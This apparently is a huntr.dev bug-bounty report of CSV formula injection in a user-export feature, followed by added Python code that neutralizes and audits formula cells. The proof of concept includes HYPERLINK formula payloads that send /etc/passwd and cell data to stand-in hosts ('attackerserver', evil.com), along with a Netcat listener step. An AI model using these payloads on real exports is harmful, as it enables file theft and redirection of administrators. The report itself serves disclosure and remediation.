huntr Sampritdas8 FA6D6E75-BC7A-40F6-9BDD-2541318912D4
Apr 01, 2022 - 5:54 p.m.

Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File

2022-04-01 17:54:17
sampritdas8
www.huntr.dev

EPSS

0.001

Percentile

49.0%

Description

The “Firstname” and “Lastname” fields are vulnerable to Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in the exported CSV file.

Proof of Concept

1. Go to Preferences from the user account and, in Personal info, insert the payloads below into “Firstname” and “Lastname”.

2. Payloads:

=HYPERLINK(CONCATENATE("http://attackerserver:port/a.txt?v="; ('file:///etc/passwd'#$passwd.A1)); "poc")

=HYPERLINK("http://evil.com?x="&A3&","&B3&"[CR]","Error fetching info: Click me to resolve.")

3. Start your Python server or Netcat listener.

4. Then, from the admin account, go to “System” -> “Users” -> “three dot” -> click on “Export Data” and select “CSV” in “Format” -> “Generate export” -> “Download Export”.

5. Open the downloaded CSV and click on “poc” and “Error fetching info: Click me to resolve.” You will see that the attacker is able to get /etc/passwd of the admin's system, and he will also be redirected to evil.com.
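One way to neutralize formula cells when the user export is generated, and to audit an existing export for them. This is an added example, not the affected project's code; the column names, function names and sample rows are assumptions constructed for illustration.

```python
import csv
import io

# Leading characters that make a spreadsheet evaluate a cell (per OWASP CSV injection guidance).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
FIELDS = ["firstname", "lastname"]  # assumed column names for the exported profile fields

# Constructed sample rows; the formulas are harmless stand-ins, not the report's payloads.
SAMPLE_USERS = [
    {"firstname": '=HYPERLINK("http://example.invalid/","poc")', "lastname": "Doe"},
    {"firstname": "Alice", "lastname": "@SUM(1+1)"},
    {"firstname": "Bob", "lastname": "O'Neil"},
]


def is_formula(text):
    """True if a spreadsheet would treat this cell text as a formula."""
    return text.lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize_cell(value):
    """Return the value as text, prefixed with ' when it would otherwise be evaluated."""
    text = "" if value is None else str(value)
    # Trade-off: legitimate values such as "-5" are also prefixed and exported as text.
    return "'" + text if is_formula(text) else text


def export_users_csv(rows, fieldnames=FIELDS, neutralize=True):
    """Write rows to CSV text; neutralize=False reproduces the unsafe export."""
    clean = neutralize_cell if neutralize else (lambda v: "" if v is None else str(v))
    buf = io.StringIO()
    # QUOTE_ALL keeps embedded quotes and separators from starting a new cell.
    writer = csv.DictWriter(buf, fieldnames=fieldnames, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({name: clean(row.get(name)) for name in fieldnames})
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Audit an export: list (record_number, column, value) for cells that would be evaluated."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return [(n, col, val) for n, row in enumerate(reader, start=1)
            for col, val in row.items() if val and is_formula(val)]


if __name__ == "__main__":
    print(find_formula_cells(export_users_csv(SAMPLE_USERS, neutralize=False)))
    print(export_users_csv(SAMPLE_USERS))
```
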

Video, Image & CSV PoC

https://drive.google.com/drive/folders/1IZioPhBSYJaAy8sBw5wvvk_Mtcb9vXZv?usp=sharing
